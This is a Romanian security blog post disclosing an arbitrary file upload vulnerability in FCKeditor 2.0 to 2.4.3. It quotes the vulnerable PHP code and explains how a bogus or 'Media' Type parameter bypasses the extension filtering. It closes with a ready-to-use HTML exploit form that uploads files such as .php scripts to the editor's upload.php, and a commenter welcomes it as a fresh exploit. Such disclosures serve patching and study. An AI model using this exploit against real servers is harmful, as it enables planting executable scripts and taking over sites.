Vulnerabilitate FCKeditor 2.0-2.4.3 - Securitatea Informatica

Vulnerabilitate FCKeditor 2.0-2.4.3

Data:
11 noiembrie 2010

Descriere:
Se poate face upload de fisiere cu orice extensie pe server.

Pentru versiunea 2.0 – 2.2 codul vulnerabil este in fisierul FCKeditor/editor/filemanager/upload/php/upload.php:

$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

// Get the allowed and denied extensions arrays.
$arAllowed = $Config['AllowedExtensions'][$sType] ;
$arDenied = $Config['DeniedExtensions'][$sType] ;

asa ca putem trimite ca parametru GET “Type” orice text care nu e continut in (File, Flash, Image) si putem face upload la fisier cu orice extensie (ex. .php)

Pentru versiunea 2.3.0 – 2.4.3 codul vulnerabil este in fisierul FCKeditor/editor/filemanager/upload/php/upload.php:

$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;

// Check if it is an allowed type.
if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
SendResults( 1, '', '', 'Invalid type specified' ) ;

// Get the allowed and denied extensions arrays.
$arAllowed = $Config['AllowedExtensions'][$sType] ;
$arDenied = $Config['DeniedExtensions'][$sType] ;

in acest cod se face filtrarea dupa parametrul GET “Type”, dar in config.php:

$Config['AllowedExtensions']['Media'] si $Config['DeniedExtensions']['Media'] nu exista. Daca trimitem Type=Media ca parametru GET putem face uploadul fisierului ca anterior.

Exploit:

<form action="http://localhost/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" enctype="multipart/form-data" method="post"> <input name="NewFile" type="file" />
<input type="submit" value="submit" />
</form>

Twitter Digg Delicious Stumbleupon Technorati Facebook


Un raspuns la “Vulnerabilitate FCKeditor 2.0-2.4.3”

  1. hehehe…e binevenit un exploit nou pentru fckeditor. Ala vechi cam ruginise :)

Lasa un raspuns

This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro